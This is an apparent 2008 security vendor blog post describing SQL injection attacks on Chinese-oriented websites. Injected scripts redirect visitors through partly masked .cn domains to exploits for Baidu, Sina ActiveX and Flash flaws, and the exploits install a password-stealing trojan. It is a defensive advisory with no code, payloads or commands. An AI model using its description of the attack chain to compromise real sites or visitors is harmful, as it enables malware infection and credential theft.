NEWS FROM THE LAB - Friday, August 8, 2008

SQL Injection Attacks Targeting Chinese-oriented Sites Posted by Response @ 07:17 GMT

With all the attention on China these days, especially in conjunction with the Beijing 2008 Olympics Games, and with "China" being one of the more popular search engine keywords at the moment, it makes sense for malware writers to focus their attention on the Chinese web — and we've been seeing some interesting examples of SQL injection attacks specifically targeting websites designed for a Chinese audience, whether from the mainland or overseas.

Like most SQL injection attacks, these attacks begin with a compromising script being injected into a legitimate site, compromising it and redirecting its users to a malicious website. This website then takes advantage of the vulnerabilities available on the user's computer to download and execute malicious programs.

Obfuscated Script

In one of the samples we received, a close look at the obfuscated URL showed that users of the compromised website were being redirected to "http://vc??.cn". Though this malicious website was first reported in April 2008, it is still live and infectious today. Additional mirror sites include pdh0??.cn, iihao??.cn, qqhao??.cn, yyhao??.cn, zzhao??.cn and more, but they all redirect users to two sites hosting the most invasive programs: jzm0??.cn and hby0??.cn.

The "vc??.cn" website basically functions like a transit station, deciding which website the user gets shunted to next, depending on what browser they are using. Whichever route they take, they are finally infected with a password stealer trojan, which we detect as Trojan-GameThief.Win32.OnLineGames.snsq.

Infected Results

The interesting thing about this particular SQL injection attack is that a number of vulnerabilities the malware writers exploit are most likely to be used by Chinese websites, and by extension are targeted specifically towards Chinese (or Chinese-language literate) visitors. For example, the Baidu Soba Remote Code Execute Vulnerability is more or less exclusive to the Chinese web, as is the Sina DLoader Class ActiveX Control "DonwloadAndInstall" Method Arbitrary File Download Vulnerability.

That's not to say that non-Chinese visitors won't be affected by this attack, as a specially crafted Flash file exploiting Adobe Flash Player Integer overflow (CVE-2007-0071) is also served. When the webpage is loaded, it forcefully floods the user's computer memory beyond its capacity, then takes advantage of the computer's attempts to correct the problem to execute its own hidden code. If the user hasn't updated their Flash Player to newer versions than those targeted, their computer is vulnerable.

For such users then, the best advice would be to run the F-Secure Health Check to determine if your computer has all the latest updates and most importantly, don't click on any suspicious links related to the Olympics!

Response Team post by � Lordian & Alia